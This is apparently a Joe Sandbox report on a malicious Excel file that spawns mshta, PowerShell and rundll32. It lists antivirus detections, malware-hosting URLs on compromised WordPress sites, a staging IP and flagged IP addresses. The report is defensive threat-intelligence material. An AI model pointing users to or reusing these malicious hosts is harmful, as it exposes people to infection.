                            SourceDetectionScannerLabelLinkDownload
                            10.2.rundll32.exe.2280000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.3060000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.3150000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.27a0000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2890000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.420000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2830000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2810000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2100000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.3e0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.610000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.28a0000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2860000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.330000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2080000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2130000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            16.2.rundll32.exe.190000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.6c0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            16.2.rundll32.exe.440000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.26d0000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            14.2.rundll32.exe.330000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.31c0000.15.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.3190000.14.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.26b0000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.190000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.2840000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.430000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.28c0000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.1c0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2740000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2160000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2730000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.460000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.27a0000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            9.2.rundll32.exe.340000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2340000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2890000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            11.2.rundll32.exe.470000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.4f0000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.23c0000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.200000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2dc0000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.380000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.4f0000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.28f0000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2950000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.23f0000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.260000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.3030000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            11.2.rundll32.exe.1a0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.4c0000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.3160000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.630000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.660000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2e10000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.2870000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2490000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            14.2.rundll32.exe.300000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.27c0000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.180000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2ed0000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2e00000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            9.2.rundll32.exe.1c0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2170000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.2700000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2890000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                            Domains

                            SourceDetectionScannerLabelLink
                            kuyporn.com10%VirustotalBrowse

                            URLs

                            SourceDetectionScannerLabelLink
                            http://kuyporn.com/wp-content/XS100%Avira URL Cloudmalware
                            http://docs-construction.com/wp-admin/JJEf0kEA5/PE3100%Avira URL Cloudmalware
                            http://91.240.118.168/qqw/aas/se.htmlMuzL100%Avira URL Cloudmalware
                            http://91.240.118.168/qqw/aas/se.htmlWinSta0100%Avira URL Cloudmalware
                            https://algzor.c0%Avira URL Cloudsafe
                            http://91.240.118.168/qqw/aas/se.htmlfunction100%Avira URL Cloudmalware
                            https://grupomartinsanchez.com/w100%Avira URL Cloudmalware
                            https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/PE3100%Avira URL Cloudmalware
                            http://91.240.118.168/qqw/aas/se.htmlv1.0100%Avira URL Cloudmalware
                            https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/PE3100%Avira URL Cloudmalware
                            http://kuyporn.c0%Avira URL Cloudsafe
                            https://elroieyecentre.org/cgi-b100%Avira URL Cloudmalware
                            https://thaireportchannel.com/wp-includes/KaWZp0odkEO/PE3100%Avira URL Cloudmalware
                            http://jeffreylubin.igclout.com/wp-admin/vzOG/100%Avira URL Cloudmalware
                            http://91.240.110%URL Reputationsafe
                            http://kuyporn.com/wp-content/XSs5/100%Avira URL Cloudmalware
                            http://docs-construction.com/wp-admin/JJEf0kEA5/100%Avira URL Cloudmalware
                            http://flybustravel.com/cgi-bin/2TjUH/100%Avira URL Cloudmalware
                            http://www.protware.com/0%URL Reputationsafe
                            http://wallacebradley.com/css/Yc100%Avira URL Cloudmalware
                            http://91.240.118.168/qqw/aas/se.htmlXtrP100%Avira URL Cloudmalware
                            http://91.240.118.168/qqw/aas/se.pngPE3100%Avira URL Cloudmalware
                            http://wallacebradley.com/css/YcDc927SJR/100%Avira URL Cloudmalware
                            https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/PE3100%Avira URL Cloudmalware
                            https://algzor.com/wp-includes/g100%Avira URL Cloudmalware
                            http://91.240.118.168/qqw/aas/se.htmlEtrM100%Avira URL Cloudmalware
                            http://wallacebradley.com/css/YcDc927SJR/PE3100%Avira URL Cloudmalware
                            http://91.240.118.168/qqw/aas/se.htmlhttp://91.240.118.168/qqw/aas/se.html100%Avira URL Cloudmalware
                            http://docs-construction.com/wp-0%Avira URL Cloudsafe
                            http://91.240.118.168/qqw/aas/se.htmlA(100%Avira URL Cloudmalware
                            https://bluwom-milano.com/wp-content/FEj3y4z/100%Avira URL Cloudmalware
                            https://esaci-egypt.com/wp-includes/W7qXVeGp/100%Avira URL Cloudmalware
                            https://thaireportchannel.com/wp-includes/KaWZp0odkEO/100%Avira URL Cloudmalware
                            http://91.240.118.168/qqw/aas/se.htmlO(100%Avira URL Cloudmalware
                            http://kuyporn.com100%Avira URL Cloudmalware
                            http://flybustravel.com/cgi-bin/2TjUH/PE3100%Avira URL Cloudmalware
                            http://kuyporn.com/wp-content/XSs5/PE3100%Avira URL Cloudmalware
                            http://91.240.118.168/qqw/aas/se.html100%Avira URL Cloudmalware
                            http://91.240.118.168/qqw/aas/se.htmlB100%Avira URL Cloudmalware
                            https://bluwom-milano.com/wp-con100%Avira URL Cloudmalware
                            https://bluwom-milano.com/wp-content/FEj3y4z/PE3100%Avira URL Cloudmalware
                            http://jeffreylubin.igclout.com100%Avira URL Cloudmalware
                            https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/100%Avira URL Cloudmalware
                            http://www.protware.com0%URL Reputationsafe
                            http://91.240.118.168/qqw/aas/se100%Avira URL Cloudmalware
                            http://91.240.118.168/qqw/aas/se.png100%Avira URL Cloudmalware
                            https://thaireportchannel.com/wp100%Avira URL Cloudmalware
                            http://jeffreylubin.igclout.com/100%Avira URL Cloudmalware
                            http://91.240.118.168/qqw/aas/se.htmlC:100%Avira URL Cloudmalware
                            http://flybustravel.com/cgi-bin/100%Avira URL Cloudmalware
                            http://jeffreylubin.igclout.com/wp-admin/vzOG/PE3100%Avira URL Cloudmalware
                            https://esaci-egypt.com/wp-inclu100%Avira URL Cloudmalware
                            https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/100%Avira URL Cloudmalware
                            http://91.240.118.168100%URL Reputationmalware
                            https://algzor.com/wp-includes/ghFXVrGLEh/PE3100%Avira URL Cloudmalware
                            https://algzor.com/wp-includes/ghFXVrGLEh/100%Avira URL Cloudmalware
                            https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/100%Avira URL Cloudmalware
                            http://91.240.118.168/qqw/aas/se.htmlmshta100%Avira URL Cloudmalware
                            https://esaci-egypt.com/wp-includes/W7qXVeGp/PE3100%Avira URL Cloudmalware
                            https://pcovestudio.com/wp-admin100%Avira URL Cloudmalware

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            kuyporn.com
                            		172.67.149.209
                            		truetrueunknown
                            jeffreylubin.igclout.com
                            		74.208.236.157
                            		truefalse
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://jeffreylubin.igclout.com/wp-admin/vzOG/true
                              • Avira URL Cloud: malware
                              		unknown
                              http://kuyporn.com/wp-content/XSs5/true
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.118.168/qqw/aas/se.htmltrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.118.168/qqw/aas/se.pngtrue
                              • Avira URL Cloud: malware
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://kuyporn.com/wp-content/XSpowershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://docs-construction.com/wp-admin/JJEf0kEA5/PE3powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.118.168/qqw/aas/se.htmlMuzLmshta.exe, 00000004.00000003.415189643.00000000002FC000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.118.168/qqw/aas/se.htmlWinSta0mshta.exe, 00000004.00000002.434814870.0000000000290000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://algzor.cpowershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://91.240.118.168/qqw/aas/se.htmlfunctionmshta.exe, 00000004.00000003.418218977.0000000002B9D000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://grupomartinsanchez.com/wpowershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/PE3powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.118.168/qqw/aas/se.htmlv1.0mshta.exe, 00000004.00000003.432720286.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415279373.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436709573.0000000000389000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/PE3powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://kuyporn.cpowershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://elroieyecentre.org/cgi-bpowershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://thaireportchannel.com/wp-includes/KaWZp0odkEO/PE3powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.11powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                              • URL Reputation: safe
                              		low
                              http://docs-construction.com/wp-admin/JJEf0kEA5/powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://flybustravel.com/cgi-bin/2TjUH/powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.protware.com/mshta.exe, 00000004.00000003.432412944.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415021403.00000000035C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431896244.0000000005A68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431603651.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431688138.0000000005A68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437362266.0000000005A68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437239734.000000000409B000.00000004.00000010.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437126353.00000000035CA000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://wallacebradley.com/css/Ycpowershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.118.168/qqw/aas/se.htmlXtrPmshta.exe, 00000004.00000002.434904863.00000000002EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432627473.00000000002E6000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.118.168/qqw/aas/se.pngPE3powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://wallacebradley.com/css/YcDc927SJR/powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/PE3powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://algzor.com/wp-includes/gpowershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.118.168/qqw/aas/se.htmlEtrMmshta.exe, 00000004.00000002.434814870.0000000000290000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://wallacebradley.com/css/YcDc927SJR/PE3powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.118.168/qqw/aas/se.htmlhttp://91.240.118.168/qqw/aas/se.htmlmshta.exe, 00000004.00000003.416857633.0000000002B95000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://docs-construction.com/wp-powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://91.240.118.168/qqw/aas/se.htmlA(mshta.exe, 00000004.00000003.432720286.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415279373.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436709573.0000000000389000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://bluwom-milano.com/wp-content/FEj3y4z/powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://esaci-egypt.com/wp-includes/W7qXVeGp/powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://thaireportchannel.com/wp-includes/KaWZp0odkEO/powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.118.168/qqw/aas/se.htmlO(mshta.exe, 00000004.00000003.432720286.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415279373.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436709573.0000000000389000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://kuyporn.compowershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://flybustravel.com/cgi-bin/2TjUH/PE3powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://kuyporn.com/wp-content/XSs5/PE3powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.118.168/qqw/aas/se.htmlB80_513972285.xls.0.drtrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://bluwom-milano.com/wp-conpowershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://bluwom-milano.com/wp-content/FEj3y4z/PE3powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://jeffreylubin.igclout.compowershell.exe, 00000006.00000002.677511514.00000000039CA000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://www.cloudflare.com/5xx-error-landingpowershell.exe, 00000006.00000002.677511514.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.protware.commshta.exe, 00000004.00000003.432498297.0000000003536000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437126353.00000000035CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://91.240.118.168/qqw/aas/sepowershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://thaireportchannel.com/wppowershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000006.00000002.670395063.00000000003E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://jeffreylubin.igclout.com/powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://91.240.118.168/qqw/aas/se.htmlC:mshta.exe, 00000004.00000003.432720286.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415279373.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436709573.0000000000389000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://flybustravel.com/cgi-bin/powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://jeffreylubin.igclout.com/wp-admin/vzOG/PE3powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://esaci-egypt.com/wp-inclupowershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://91.240.118.168powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                                  • URL Reputation: malware
                                  		unknown
                                  http://www.piriform.com/ccleanerpowershell.exe, 00000006.00000002.670395063.00000000003E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://algzor.com/wp-includes/ghFXVrGLEh/PE3powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://algzor.com/wp-includes/ghFXVrGLEh/powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://91.240.118.168/qqw/aas/se.htmlmshtamshta.exe, 00000004.00000002.434814870.0000000000290000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://esaci-egypt.com/wp-includes/W7qXVeGp/PE3powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://pcovestudio.com/wp-adminpowershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    207.148.81.119
                                    		unknownUnited States
                                    		20473AS-CHOOPAUStrue
                                    104.131.62.48
                                    		unknownUnited States
                                    		14061DIGITALOCEAN-ASNUStrue
                                    198.199.98.78
                                    		unknownUnited States
                                    		14061DIGITALOCEAN-ASNUStrue
                                    194.9.172.107
                                    		unknownunknown
                                    		207992FEELBFRtrue
                                    59.148.253.194
                                    		unknownHong Kong
                                    		9269HKBN-AS-APHongKongBroadbandNetworkLtdHKtrue
                                    74.207.230.120
                                    		unknownUnited States
                                    		63949LINODE-APLinodeLLCUStrue
                                    103.41.204.169
                                    		unknownIndonesia
                                    		58397INFINYS-AS-IDPTInfinysSystemIndonesiaIDtrue
                                    85.214.67.203
                                    		unknownGermany
                                    		6724STRATOSTRATOAGDEtrue
                                    191.252.103.16
                                    		unknownBrazil
                                    		27715LocawebServicosdeInternetSABRtrue
                                    168.197.250.14
                                    		unknownArgentina
                                    		264776OmarAnselmoRipollTDCNETARtrue
                                    185.148.168.15
                                    		unknownGermany
                                    		44780EVERSCALE-ASDEtrue
                                    66.42.57.149
                                    		unknownUnited States
                                    		20473AS-CHOOPAUStrue
                                    91.240.118.168
                                    		unknownunknown
                                    		49453GLOBALLAYERNLtrue
                                    139.196.72.155
                                    		unknownChina
                                    		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                                    217.182.143.207
                                    		unknownFrance
                                    		16276OVHFRtrue
                                    203.153.216.46
                                    		unknownIndonesia
                                    		45291SURF-IDPTSurfindoNetworkIDtrue
                                    159.69.237.188
                                    		unknownGermany
                                    		24940HETZNER-ASDEtrue
                                    116.124.128.206
                                    		unknownKorea Republic of
                                    		9318SKB-ASSKBroadbandCoLtdKRtrue
                                    37.59.209.141
                                    		unknownFrance
                                    		16276OVHFRtrue
                                    78.46.73.125
                                    		unknownGermany
                                    		24940HETZNER-ASDEtrue
                                    210.57.209.142
                                    		unknownIndonesia
                                    		38142UNAIR-AS-IDUniversitasAirlanggaIDtrue
                                    172.67.149.209
                                    		kuyporn.comUnited States
                                    		13335CLOUDFLARENETUStrue
                                    185.148.168.220
                                    		unknownGermany
                                    		44780EVERSCALE-ASDEtrue
                                    74.208.236.157
                                    		jeffreylubin.igclout.comUnited States
                                    		8560ONEANDONE-ASBrauerstrasse48DEfalse
                                    54.37.228.122
                                    		unknownFrance
                                    		16276OVHFRtrue
                                    185.168.130.138
                                    		unknownUkraine
                                    		49720GIGACLOUD-ASUAtrue
                                    190.90.233.66
                                    		unknownColombia
                                    		18678INTERNEXASAESPCOtrue
                                    142.4.219.173
                                    		unknownCanada
                                    		16276OVHFRtrue
                                    54.38.242.185
                                    		unknownFrance
                                    		16276OVHFRtrue
                                    195.154.146.35
                                    		unknownFrance
                                    		12876OnlineSASFRtrue
                                    195.77.239.39
                                    		unknownSpain
                                    		60493FICOSA-ASEStrue
                                    78.47.204.80
                                    		unknownGermany
                                    		24940HETZNER-ASDEtrue
                                    118.98.72.86
                                    		unknownIndonesia
                                    		7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDtrue
                                    37.44.244.177
                                    		unknownGermany
                                    		47583AS-HOSTINGERLTtrue
                                    62.171.178.147
                                    		unknownUnited Kingdom
                                    		51167CONTABODEtrue
                                    128.199.192.135
                                    		unknownUnited Kingdom
                                    		14061DIGITALOCEAN-ASNUStrue

                                    General Information

                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                    Analysis ID:562424
                                    Start date:28.01.2022
                                    Start time:21:23:48
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 12m 5s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:80_513972285.xls
                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                    Number of analysed new started processes analysed:18
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.expl.evad.winXLS@25/9@2/36
                                    EGA Information:
                                    • Successful, ratio: 71.4%
                                    HDC Information:
                                    • Successful, ratio: 18.1% (good quality ratio 17.1%)
                                    • Quality average: 72%
                                    • Quality standard deviation: 25.6%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 53
                                    • Number of non-executed functions: 193
